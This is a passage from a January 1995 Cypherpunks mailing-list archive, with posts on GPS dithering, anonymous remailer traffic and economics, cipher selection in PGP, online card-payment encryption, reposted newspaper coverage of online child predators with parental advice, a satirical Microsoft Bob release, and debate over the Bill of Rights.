iXH4F15Hws55g07ZRQ9r+JGTL33mP5G1RAg/dfeXixvS2uXTWSknF37tQdVZFpzA 2USM2cnEsPU= =71jL -----END PGP SIGNATURE----- From crunch at well.sf.ca.us Wed Jan 11 11:55:59 1995 From: crunch at well.sf.ca.us (John Draper) Date: Wed, 11 Jan 95 11:55:59 PST Subject: Getting on the list Message-ID: <199501111955.LAA29153@well.sf.ca.us> Hi, I've been trying to get back on the Cypherpunks list now for over 3 weeks. IS anyone out there on the list that has the power to get me added. I tried the usual request to cypherpunks-request at toad.com, but haven't been sucessful. Who is maintaining the list these days? Does it still exist? And why haven't any of my requests been hohored? thats honored... Thanx John D. From cactus at seabsd.hks.net Wed Jan 11 11:59:43 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Wed, 11 Jan 95 11:59:43 PST Subject: Storm Signals In-Reply-To: Message-ID: <199501112004.PAA12969@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Samuel Kaplin wrote: >Perhaps it is two unrelated events. Maybe the Russians are using GPS in >their attack on Chechnya, and the administration decided "Not on our dime." To clarify a little bit: I summarized wrongly. The GPS fine location has not been turned off, the dithering has been turned off. In essence, the GPS fine positioning usually lies in a particular algorithmic way designed to make determining exact locations extrememly difficult. In theory, the military GPS units bypass this dithering. Either it doesn't work or there aren't enough military units (I believe the latter is the official story), but GPS fine positioning has been turned off during times like the Iraq massacre and the Haiti invasion so that the military can use civilian units. In any case, it turns out that the Green Beret in question is being sent to Haiti. It doesn't explain the GPS, tho. There's lots-o-speculation elsewhere on the net. - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxP++hNhgovrPB7dAQGUowQAgvqyOzrVxCWnumcPQyPbrWnuxn+017Wf DBM/A5VCqyzj/wpZYgBydBwZknzEYd8vxLdt32j2rlhzswHCHdsvECuN7aer9S7t 69ZlrtPn1UKy5MvTUyAdvxh5Z8Zex1eenyYd8q+favmrAB9UmX4Sh1e4JkYqPRmP is2vZ8DgAIQ= =Lmyl - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxQ5wCoZzwIn1bdtAQGWPgGAwLlWR8brXeavxwrV4CxvCK1XMZgCY8pq MixVBWLp0eti/cbmDzSS/8x9gle8PUgL =VtmS -----END PGP SIGNATURE----- From strick at versant.com Wed Jan 11 12:23:53 1995 From: strick at versant.com (strick -- henry strickland) Date: Wed, 11 Jan 95 12:23:53 PST Subject: Microsoft TrueName(tm) Message-ID: <199501112023.MAA19659@gwarn.versant.com> brat at apple.com found this somewhere.... strick Microsoft Clarifies Trademark Policies REDMOND, Washington--January 4, 1995--In response to customer inquiries, Microsoft today clarified the naming policy for Bob(tm), its new software product designed for computer beginners. Contrary to rumors, Microsoft will not demand that all persons formerly named "Bob" immediately select new first names. "I don't know where these rumors come from," commented Steve Balmer, Microsoft Executive Vice President for Worldwide Sales and Support. "It's ridiculous to think Microsoft would force people outside the computer industry to change their names. We won't, and our licensing policies for people within the industry will be so reasonable that the Justice Department could never question them." Balmer said employees of other computer companies will be given the opportunity to select new names, and will also be offered a licensing option allowing them to continue using their former names at very low cost. The new licensing program, called Microsoft TrueName(tm), offers persons who want to continue being known by the name Bob the option of doing so, with the payment of a small monthly licensing fee and upon signing a release form promising never to use OpenDoc. As an added bonus, Bob name licensees will also be authorized to display the Windows 95 logo on their bodies. Persons choosing not to license the Bob name will be given a 60-day grace period during which they can select another related name. "We're being very lenient in our enforcement of the Bob trademark," said Bill Newkom, Microsoft's Senior Vice President of Law and Corporate Affairs. "People are still free to call themselves Robert, Robby, or even Rob. Bobby however is derivative of Microsoft's trademark and obviously can't be allowed." Microsoft also announced today that Bob(tm) Harbold, its Executive Vice President and Chief Operating Officer, has become the first Microsoft TrueName licensee and will have the Windows 95 logo tattooed to his forehead. From die at pig.die.com Wed Jan 11 13:49:06 1995 From: die at pig.die.com (Dave Emery) Date: Wed, 11 Jan 95 13:49:06 PST Subject: Storm Signals In-Reply-To: <199501111759.JAA18260@netcom10.netcom.com> Message-ID: <9501112147.AA00447@pig.die.com> Tim May writes: > > This might explain the few thousand Green Berets being sent, if this > is so. About the GPS, I have nok idea, though it seems plausible. > According to a couple of friends who are evaluating use of GPS for precisely locating radio transmissions the usual selective availablity dither is still turned on and there have been no public announcements about any changes in the status of the C/A (public) part of the system. The P code part of the system is only available to the military and announcements about it may not be made from the usual USCG BBS that carries stuff about the civilian signals, but they know nothing about any change in GPS status recently, nor has there been any change in the amount of dither or its (random) nature. Dave Emery From skaplin at mirage.skypoint.com Wed Jan 11 14:29:28 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Wed, 11 Jan 95 14:29:28 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article , you wrote: I hope they took you someplace nice for lunch...You might want to file a FOI request on yourself, just to see how much they censor. ;) They might think you're the ringleader, after all the FBI doesn't buy peons lunch. ;) Sam - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== A man wrapped up in himself makes a very small package. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLxRaHMlnXxBRSgfNAQFuLgf+LPBCnBDKslirz/peeuedKN5pgDO8sZTJ B30eQqhv+qEKz+jBoRD/V0Hu9NyRdzk/R1QnlwRSVcBzS1G+/Eq+mF6P7KumurO4 QqlGH3wyNHoXTvlPuAnEiF14MTupGYeKcdvO/X4I+NE+GxAKa1V3l0L9fgO5wvnb UCWkKOYbaet366xyjRIuN7LpAuYHS7RGr1E7eKbUDz5D/gAddBDdniz9k4xMaNnT OT4Y0lujZO3J/NftqUJaGauKwVrbLLJy7DWdi9p0sqqsQFeFt5owmCPnKq1vEH2c SF7dlG/8IiJVPpSbZXiSerhOSm8OnHtqA1Ga4UYfzj5P2yrrGJHsZg== =eiFH -----END PGP SIGNATURE----- From skaplin at mirage.skypoint.com Wed Jan 11 14:32:29 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Wed, 11 Jan 95 14:32:29 PST Subject: Storm Signals In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199501112004.PAA12969 at bb.hks.net>, you wrote: > to Haiti. It doesn't explain the GPS, tho. There's lots-o-speculation > elsewhere on the net. I wonder if this might be a response to the recent Korean downing of one of our choppers. Hand them all a civilian GPS and say "DON'T GET LOST!!!" Sam - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== Back off man, We're scientists!!! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLxRaOslnXxBRSgfNAQG6Rwf+I8nRZ0JOS+UO+hVxTizWTX2AwlQok0vl 54Eqzact3HgyM6k8jC4yrAMNha042F7lxIBPjGvI8nWpKWCwvhV4WiK2+yvlYRrT 2ifJ/yrXhTzD/x27+VbPjpD2CyM2JfSYAb1U6RxMzmGa3FCC/dlNupQz6Gn8JebP Dxg3TLAzL8aZnq2vDcEBqL96/RQIY/l4ZP7fDG/on/QR5UaPr1s/kz0at0lnMIaq eSy14LpLH5oQYsI7sAfJy+Fh9Zdq0qtvFgnekFB73YZ/IGMiN8UuKVqUG35ExVcT 2qI3zhYjbyH6THNC2l8QkNlU/qSvErUUm2rvgYYZFHPSzf0uKwoZhw== =+uKC -----END PGP SIGNATURE----- From jya at pipeline.com Wed Jan 11 14:41:28 1995 From: jya at pipeline.com (John Young) Date: Wed, 11 Jan 95 14:41:28 PST Subject: Internet World on Net Security Message-ID: <199501112240.RAA11895@pipe1.pipeline.com> The entire issue of Internet World of February, 1995, is about Internet security, digital cash, encryption, firewalls and more. Here's the contents: Internet World February, 1995 Volume 6 Number 2 Contents BETTER SAFE Danger lurks on the Info Highway. You must take precautions to reduce your risk. By Dave Taylor and Rosalind Resnick GETTING CRYPTIC Phil Zimmermann's PGP gives you powerful encryption to keep your messages safe from prying eyes. Read all about it. By William Stallings SECURING THE ENTERPRISE Connecting your corporation to the Internet can be a security nightmare. Firewalls are the main line of defense. By Alton Hoover BEYOND THE FIREWALL The latest firewall technology not only detects intruders, but strikes back. By Winn Schwartau CASHING IN As Internet commerce expands, a host of companies are vying to establish their systems as the basis for cyberbanking and credit-card transactions. By Lisa Morgan BUSINESS BROWSER New versions of Mosaic with built-in encryption promise to keep your transactions safe. By Richard W. Wiggins UNLAWFUL ENTRY Crackers can feast on your data if you fail to plug your leaky Unix system. By Aaron Weiss IT'S ALIVE! Although the furor has subsided, reports of Clipper's death are greatly exaggerated. The government's controversial eavesdropping effort lives on. By Steven Vaughan-Nichols BUILDING TRUST The chief executives of Trusted Information Systems - Steve Crocker and Steve Walker - talk about encryption, CyberCash, Clipper, and more. By Jeff Ubois ------ On another topic, Mike Godwin's column, Law of the Net, deals with "Free Speech vs. Sex Discrimination Online." From jya at pipeline.com Wed Jan 11 14:44:36 1995 From: jya at pipeline.com (John Young) Date: Wed, 11 Jan 95 14:44:36 PST Subject: Mastercard Online Message-ID: <199501112244.RAA12115@pipe1.pipeline.com> The New York Times January 10, 1995, D2. Mastercard to Develop On-Line Standard By Saul Hansell Joining a stampede of companies that hope to profit from shopping on computer networks, Mastercard International said yesterday that it would develop standards for its cards to be used on the Internet. Mastercard, an association of banks that is based in New York, said it would use the technology developed by the Netscape Communications Corporation of Mountain View, Calif., a specialist in software for the Internet, the global web of computer networks. The Internet allows a company to make information on its products available to millions of computer users around the world. Increasingly, companies would like to consummate sales using the Internet as well, but the open nature of the network may allow credit card numbers to be stolen. "The problem with the Internet is there is no privacy and no security," said Edward J. Hogan, a senior vice president of Mastercard. The Mastercard plan is one of several attempts to translate credit card numbers into a code before they are sent to merchants selling goods over the network and then on to the credit card companies. Visa International has said it will develop its own encryption system with the Microsoft Corporation. Microsoft has hinted that it may charge a fee for every transaction using its system, though the details have not been announced. Netscape and Mastercard say their transaction standards will be openly published and free for other companies to use. Netscape's main business is selling software that allows companies to publish information on the Internet. To expand the market, it gives away or sells for a very small fee software that allows people to view nformation on the Internet. The company has already included a component to encrypt credit card numbers with its current version. The first merchants to allow purchases using that feature will be part of an electronic shopping service to be introduced by the MCI Communications Corporation later this month. The initial Netscape credit card system allows customers to use any brand of card. It did not involve the cooperation of credit card companies, but rather used existing rules that related to mail and telephone card orders. The agreement with Mastercard will for the first time allow purchases on the Internet with automatic teller machine or debit cards, which withdraw money from checking accounts. Mastercard will likely agree to absorb the losses from fraud on the system. Under the existing Netscape system, merchants selling goods are liable if fraudulent card numbers are used, as are companies that sell goods by mail or telephone. The debit card access and the fraud guarantee are expected to be available by the fall. End From cactus at seabsd.hks.net Wed Jan 11 14:58:08 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Wed, 11 Jan 95 14:58:08 PST Subject: Multiple symetric cyphers Message-ID: <199501112303.SAA14726@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- One of the possible weaknesses in public-key messages is their dependence upon a particular symetric cypher for the message with the session key being contained in the block encrypted by the antisymetric cypher. IE, if a weakness in IDEA is discovered, it can be exploited against all PGP messages. I'm wondering: would the strength be increased by using a randomly selected symetric cypher? IE, as PGP uses IDEA and RIPEM uses DES/3DES, what if a random cypher were selected from a set of cryptographically strong symetric cyphers and information about the cypher selected were encrypted in the RSA-encrypted block? I guess this reduces to: do strong cyphers have "signatures" of some sort, by which the type of encryption can be derived? And if so, can this "signature" be reduced by including part (eg, the first and last bytes) of the ciphertext in the RSA block rather than the "clear" cyphertext block? Just a thought, - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxQorxNhgovrPB7dAQF+HgP/b6RVkLS0vyjpVoHy1iF8IDgH1VFwci03 ZpD4tvQ+amZ3OLfMPNvM3jV3br6+/xVKax07yP0r26jbqV3T0RCNMzKLrQjnoyep /h+DBNfboeU4BkhhJFIayLp0w+ykJRvzWoa72l4Uzos66Nu9n/spXwBbrGYD3awe dUUr4YzLnhU= =xON2 - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxRjjSoZzwIn1bdtAQEt2gF/bnrL7r8CycdWz5H80DLpEFGRvDFy7zfF OQQjnGTDmdSv+d3lQOfnqP7mKJJbyqo4 =QXEU -----END PGP SIGNATURE----- From jya at pipeline.com Wed Jan 11 15:03:46 1995 From: jya at pipeline.com (John Young) Date: Wed, 11 Jan 95 15:03:46 PST Subject: Cybersmut Message-ID: <199501112303.SAA14349@pipe1.pipeline.com> New York Post, January 9, 1995 Front Page, pp. 8, 9. Four articles. A Post Investigation Computer Sickos Target Your Kids Child-porn perverts roam info-highway Furor Over Cybersmut Molesters With a Modem Kiddie-sex perverts using computers to lure victims By Lou Lumenick and Kieran Crowley City cops are about to start patrolling the information superhighway to hunt down child pornographers and pedophiles who are luring kids through high-tech computer bulletin boards, The Post has learned. "The bulletin boards are a total haven for pedophiles," said Sgt. Richard Perrine, who's forming a new computer investigation unit. There are no names and faces, and a 33-year-old man can pass himself off as a 10-year-old kid." Perrine said the new unit, in the NYPD's Organized Crime Control Bureau, plans to include computer child-pornographers and pedophiles among its targets. "We haven't really solidified our strategy yet," he told The Post. "This is something that's so new, law enforcement is not quite ready for it." Law-enforcement officials say pedophiles are lurking on the nation's three major on-line services, America Online Prodigy and Compuserve where kiddie-sex perverts are using computers to lure victims -- as well as on the worldwide Internet, smaller online services, and locally-operated computer bulletin boards. On-line services are an easy way for pedophiles to meet children anonymously, noted Dyanne Greer, a senior lawyer with the National Center for the Prosecution of Child Abuse. "Many cases are not reported, so I'm not sure anybody is really aware how much this is going on," she said. A Post probe uncovered these on-line horror stories: Westchester computer expert George Telesha pretended to be a 14-year-old girl on America Online and was quickly besieged by perverts sending dirty pictures. A Manhattan computer expert allegedly got a 13-year-old New Jersey boy he met on-line to go skating with him. Cops said the man lured the youth into the woods near the boy's home and sexually abused him six times between last July and September. An unemployed Brooklyn computer programmer tried to sodomize a Nevada teen-ager he met on a computer bulletin board. A 27-year-old computer engineer in Cupertino, Calif., allegedly met a 14-year-old boy through America Online. He is charged with handcuffing, shackling and blindfolding the boy and then taking him to his apartment, where he whipped him with a belt, shaved his pubic hair and had sex with him. California man sent pornographic photos via computer to a teen-ager, then sought to have the teen killed to silence him. Such crimes are not easy to investigate or prosecute, officials note. "It's a bigger problem than most people realize," said Mike Brick, director of the Orlando bureau of the Florida State Office of Law Enforcement. "There's a lot of people out there who want to have sex with children. If they hang out at a real playground, a teacher or someone might see them. In the computer playground they can more or less hide in the bushes." A handful of agencies have staffers pose as youngsters to solicit dirty pictures and come-ons, but many don't have the manpower, equipment or inclination to do so on a regular basis. And even if they did, experts say there's probably no way to completely stop on-line perverts -- who constitute a tiny fraction of overall on-line communicators -- short of shutting down the services. And that is not only unlikely, but would rob children and others of a valuable educational resource. The services say they're concerned -- but in no position to play the role of police. AOL spokeswoman Pam McGraw said computer-privacy laws keep her company's hands tied when it comes to the person-to-person type of communication in which porn can be exchanged in electronic "private chat rooms." "Federal law prevents us from monitoring E-mail," McGraw said. "We do our best to prevent misuse of our service." She urged AOL customers to report offensive communications -- which are prohibited under company rules -- so the company can warn offenders or eject them from the system. Law-enforcement officials say on-line companies are quick to cut off perverts and help track down and prosecute pedophiles and pornographers. But the crimes still flourish because computers make life simpler for the perverts. Pedophiles can easily pretend to be a child online, or even someone of the opposite sex, to help draw a child into a trap. And they can elude detection by using false names and post office boxes. "Offenders can say they're other kids, then arrange for face-to-face meetings," Greer said. "It's pretty scary when you find out you're dealing with a 47-year-old man instead of the 14-year-old you expected." Greer said some pedophiles have convinced children to pose for pornographic pictures. The pedophiles then trade the pictures with other perverts, or use the pictures to draw in other kids "and break down their inhibitions," she said. End Article 1 Article 2 Photo: CREEP CATCHERS: Special agent Mike Brick (white shirt) of the Florida state police and another agent track a pedophile on the computer. How to protect your children Steps parents can take to stop on-line pedophiles By Lou Lumenick Parents must take the offensive to protect their children from on-line perverts, experts say. "You wouldn't let a young child hang out in a playground or mall alone, so don't let them hang out in the computer playground by themselves," said Mike Brick of the Florida Department of Law Enforcement. "You need to exercise the same caution." So what can a parent do? First of all, experts say talk with someone at your on-line system -- whether it's America Online, Prodigy, Compuserve, Genie Delphi or one of the others. All of them allow users to limit access by children. Subscribers to America Online, for instance, can bar their children from the private "chat rooms," where the more sexually explicit conversations take place. Most services will also allow you to disable one-on-one conversations when your child logs on. Then talk with your children. Rule No. 1 is that they must never ever give their real name, address or telephone number to anyone on-line. Rule No. 2 is that they must never ever agree to meet with anyone they encounter on-line -- even if he says he's a kid the same age who lives across the street. He could very well be an adult willing to travel hundreds of miles for a sexual encounter. Beyond that, it's a matter of parental vigilance. "Make the kids teach you how to use the computer," said Dyanne Greer, a senior lawyer with the National Center for the Prosecution of Child Abuse. "Many parents take the attitude, 'Gee, my kids are learning a skill.' That's very true, but you can't be left behind or you won't know what's going on. Many experts recommend moving the computer out of the kids' bedroom into a more central place -- like the living room -- so parents can keep a closer eye on things. "If your kid wants to put the computer in his bedroom closet, I would be very nervous," Brick said. "If you find your children spending a lot of time on the service, you need to pay attention. "If every time you walk into the room, the screen goes dark, check it out. It could be the modern equivalent of kids under the cover with a flashlight reading Uncle Harry's Playboy magazine. Or worse." Brick said telltale signs of porn being downloaded include: "If you have a 100-megabyte drive and it's always full and the kids are demanding more memory. Photos can take a lot of memory. " "If you find floppy disks hidden around the house." "If you need help playing them or figuring out whether there's a problem, go to your local police department. Most will be happy to help." End Article 2 Article 3 Chilling messages made dad take action By Kieran Crowley George Telesha couldn't believe his ears. Or his modem. Telesha, 46, a bank computer specialist and president of the Westchester chapter of the Fathers Rights Association, heard from several dads that their kids were accessing porn on their home computers. So he decided to take a walk on the wild side -- on the information superhighway. Telesha, the father of two, pretended to be a 14-year-old girl named "Suzy" on an America Online computer bulletin board. He said he was besieged with perverts who sent dirty pictures. Telesha said several men sent "Suzy" porno pictures, tried to get her address and phone number -- and tried to lure her out of her home. "Can I come up to New York?" one out-of-state man said. "Can I meet you? You don't have to tell your parents." When "Suzy" mentioned her parents were not home, another man became very insistent, Telesha said. "I live in New York. Can I come over? I'll take you shopping," the man messaged "Suzy" in trying to set up a date at a local mall. One man said he lived in New Jersey and invited "Suzy" over for a photo session. Telesha said his most disturbing exchange was with a man who sent child sex pictures. "Do you have any more of these?" Telesha asked. "Usually, it's just one session," the man typed back. "That sent chills through me," said Telesha, fearing the photographed children may have been harmed. "It's mind-boggling. I haven't slept in a week. What happened to the children in these pictures? What is going to happen to them?" One AOL subscriber even offered hints on how to pick up young girls and take pornographic pictures of them Telesha said. "I think people ought to know what's going on. I just want to see it stopped," he said. End Article 3 [Article 4 reports on exchanges between Telesha masquerading as three different girls and AOL subscribers. Too disgusting to post. Censorship imposed for lurking kiddies.] From jcorgan at scruznet.com Wed Jan 11 15:10:45 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Wed, 11 Jan 95 15:10:45 PST Subject: Remailer traffic loads? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Is there someplace that remailer operators routinely post information about traffic load? The reason I ask is that this issue can have a bearing on selection of remailers for chaining. Using Raph's list, one can gather an approximate feel for latency and reliability, but there is no way to know if a site is forwarding hundreds or thousands of messages a day (which would be good for traffic analysis), or just a few tens (which makes in/out analysis much easier.) Raph's list is a good 'reputation' system; however, it lacks this one bit of info which would be immensely helpful. Periodic postings of remailer frequency usage to alt.privacy.anon-server by the operators would be one way to propagate this info. Of course, I may be overlooking something basic: Would posting this info pose any kind of security weakness? I imagine not; if someone wants to get this info for traffic analysis, they just watch the remailer for a day or so. == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxRlJU1Diok8GKihAQHdJgP+IlVlKRkCbZQCjr9VgEgWLt0dY2jP4s5k WcRkpBHXnFxV2nkM2zF9L/UMf1hKkfcdqZj5FuLWLUE48pPvfZuhRebMq8BBay6R 5k0PiA095561uJb6T1mIwm+Tb3x/KZ/ZCMceoe5SA2lu8b6vmh+QdS/ZOc1aFsIj rhrquyzeCZs= =yjPJ -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Wed Jan 11 15:37:16 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 11 Jan 95 15:37:16 PST Subject: Storm Signals Message-ID: <199501112337.PAA20199@jobe.shell.portal.com> > > > > 1: Somebody's roommate (a Green Beret) has been called back into > > > > 6 months of active service. He was not told where he'd be. > > > Perhaps Bosnia? > > > > I doubt it. [...] > > > > Military action also requires political will, and with the recent change > in power in the US govt there is no way anything is going to happen for at > least six months. Freshmen congressmen do not sign off on a war the first True. But clandestine operations don't require the approval of Congress. In fact, the prez never has to admit they exist. Ever. Read the Pentagon Papers. -Rat From lmccarth at ducie.cs.umass.edu Wed Jan 11 15:50:04 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Wed, 11 Jan 95 15:50:04 PST Subject: Remailer traffic loads? Message-ID: <199501112355.SAA15222@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > Is there someplace that remailer operators routinely post information > about traffic load? Remailers operating Matt Ghio's or Lance Cottrell's software should autoreply to a message with "Subject: remailer-stats" with a bar chart indicating the number of messages remailed in each of the past 24 hours. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxRvwioZzwIn1bdtAQFdEQF/dTXM3ii1pAHUV108kMx8N3urhv/HAHQc IZHLEqfOcNTDaV6ZrDxuT+0AZzhdu8rL =ZKwP -----END PGP SIGNATURE----- From dave at esi.COM.AU Wed Jan 11 16:01:22 1995 From: dave at esi.COM.AU (Dave Horsfall) Date: Wed, 11 Jan 95 16:01:22 PST Subject: Storm Signals In-Reply-To: <199501111859.AA02457@poboy.b17c.ingr.com> Message-ID: On Wed, 11 Jan 1995, Paul Robichaux wrote: > If I were the DOD, I would set the standard GPS default to selective > availability. After all, with SA on military receivers can still get > fine positioning data. If someone could come up with a good reason to > turn SA off, great, but I wouldn't leave it on otherwise. This gets discussed to death over on the sci.geo.satellite-nav group. The consensus is that you don't want to advertise your intentions, but political considerations have always overridden practicalities. > The scenarios concerning GPS-piloted Cessnas full of nasty stuff come > to mind, especially vis-a-vis the North Koreans. They probably don't > have accurate IRBMs but they certainly could cobble together a > Learjet-based delivery system. This too gets discussed to death over on the sci.geo.satellite-nav group. The consensus is that a car-bomb is cheaper and more reliable, and needs nothing more than a street-directory for navigation. -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From pierre at shell.portal.com Wed Jan 11 16:05:01 1995 From: pierre at shell.portal.com (Pierre Uszynski) Date: Wed, 11 Jan 95 16:05:01 PST Subject: Remailing pricing and cover traffic Message-ID: <199501120004.QAA24479@jobe.shell.portal.com> We have been debating payment systems for remailers under the following assumptions: a) Reliable remailers will have to justify professional management by making money for their owners. b) End-of-chain remailers will need to make money to cover for their legal expenses. c) Payment would limit abuse. I already countered the last point. Let me try to deal with the first two to conclude that many professionally run remailers may very well stay free or close to that for a long time: Remailers are only one of many kinds of businesses that have been described on this list. Others will include reputation markets, near-traditional banking systems, stamp issuers, certification agencies, data havens etc... But we have also seen that nearly all other forms of businesses already now cannot but run afoul of a tentacular law at some time or other. We have concluded that many of these businesses would migrate to cypherspace, hiding their locations, owners, books, assets and other information too dangerous to keep in the open. Each such organisation will generate lots of traffic, in part under control of whoever is trying to do business with it. So they are potentially easily traceable and subject to legal or violent consequences. A possible solution is of course for their sites to be remailers too. Lots of non-descript remailers, trading lots of encrypted traffic, a lot of it remailer management info and bogus filler traffic. When you are one of many, and people correspond with you only through limited traffic anonymous response blocks, then the remailers help you stay hidden by providing cover traffic. But for this to work you must consistently attract a lot of cover traffic through your remailer(s). If others undercut your stamp price, or best your reliability status, you are in trouble because traffic will migrate to other more competitive remailers, and you will be left dry on the sand with the task to generate believable cover traffic yourself. You are also competing with the cypherspace customers hiding their own personal traffic under cover of "everyone-a-remailer" remailers. It may well be much simpler for cypherbusinesses to stay competitive on the "middle" remailer market, even at a loss, and to transmit volumes of believable (because real) cover traffic. End-of-chain (or more precisely "clear-text") remailers can be expected to be a minority as, after all, they are only needed to post to public forums. Maybe these will charge a fee. For the others, the most and biggest "porn GIFs" go through (even for free), the better... However, large free remailers may then arise suspicion: There is little reason to run a heavy traffic remailer for free, apart from getting cover traffic. Competition may then settle at a small price, far from enough to keep the remailer running, but enough to not be too conspicuous. Or better, non-profit remailers may become ubiquitous, being used in part to provide cover traffic and in part to transfer money from the cypherspace businesses to cover for the cost of the computers and obvious living expenses. Between cypherbusinesses, everyone-a-remailer operations, and a few real non-profits, most remailing may stay close to free for a long time. Untraceable money will be useful for all kinds of things, but maybe not so much for remailing. Pierre. pierre at shell.portal.com From pstemari at erinet.com Wed Jan 11 16:06:04 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Wed, 11 Jan 95 16:06:04 PST Subject: Getting on the list Message-ID: <9501112357.AB02726@eri.erinet.com> At 11:55 AM 1/11/95 -0800, John Draper wrote: > ... I tried the usual request to cypherpunks-request at toad.com, but haven't >been sucessful. > >Who is maintaining the list these days? Does it still exist? And >why haven't any of my requests been hohored? Cypherpunks uses the majordomo software. Try sending a message to majordomo at toad.com containing the following two lines: help subscribe cypherpunks --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From pstemari at erinet.com Wed Jan 11 16:11:43 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Wed, 11 Jan 95 16:11:43 PST Subject: Pornography, What is it? Message-ID: <9501112356.AA02726@eri.erinet.com> At 11:33 PM 1/10/95, Timothy C. May wrote: > ... I'm not a lawyer, and it's been 25 years since I was in a "civics" >class, so I'm sorry to not recall the precise language by which >"Congress shall make no law" also is taken to apply to Sacramento, >Albany, Austin, and so forth. The 14th Amendment extended the restrictions that the Bill of Rights place on the Federal Gov't to the state gov'ts. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From root at einstein.ssz.com Wed Jan 11 16:41:14 1995 From: root at einstein.ssz.com (root) Date: Wed, 11 Jan 95 16:41:14 PST Subject: Pornography, What is it? In-Reply-To: <9501112356.AA02726@eri.erinet.com> Message-ID: <199501120029.SAA00164@einstein.ssz.com> > > At 11:33 PM 1/10/95, Timothy C. May wrote: > > ... I'm not a lawyer, and it's been 25 years since I was in a "civics" > >class, so I'm sorry to not recall the precise language by which > >"Congress shall make no law" also is taken to apply to Sacramento, > >Albany, Austin, and so forth. > > The 14th Amendment extended the restrictions that the Bill of Rights place > on the Federal Gov't to the state gov'ts. > > > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com > Article XIV (1868) Sec. 1. All persons born or naturalized in the United States, and subject to the jurisdiction thereof, are citizens of the United States and of the States wherein they reside. No state shall make or enforce any law which shall abridge the privileges or immunities of citizens of the United States; nor shall any State deprive any person of life, liberty, or property, without due process of law; nor deny to any person within its jurisdiction the equal protection of the laws. Where in there is the protection you speak of? I see no guarantee of my Constitutional rights, only of privileges and immunities as granted by the federal government. The 1st Amendment say: Article 1 (1791) Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press; or the right of the people to assemble, and to petition the government for a redress of greivances. Lets examine the first part of this article. Since Congress is prohibited from making any law (ie no law) respecting religion it follows they don't even get the opportunity to define religion. When one considers the Supreme Courts view of Rastafarians, Coptics, and the Native American Church it is clear they are making laws respecting an establishment of religion. It is also clear they are prohibiting the free exercise thereof as well. The attacks on freedom of speech are quite clear and I won't go into them. The last part is quite irrelevant since as citizens we can't even sue the government in civil court without first getting its permission. Not what I would call supporting our rights to redress of greivances. Article IV (1791) The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized. Have you ever heard of the DoJ Forfeiture Super Fund? Why do courts allow law enforcement to act upon anonymous tips when no oath or affirmation is given in such a case? Article V (1791) No person shall be held to answer for a capital, or otherwise infamous crime, unless on a presentment or indictment of a grand jury, except in cases arising in the land or naval forces, or in the militia, when in actual service in time of war or public danger; nor shall any person be subject for the same offence to be twice put in jeopardy of life or limb; nor shall be compelled in any criminal case to be a witness against himself, nor deprived of life, 